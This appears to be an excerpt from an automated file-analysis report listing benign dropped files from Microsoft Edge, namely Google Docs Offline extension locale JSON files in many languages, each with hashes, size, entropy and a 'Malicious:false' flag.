                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                    MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                    SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                    SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
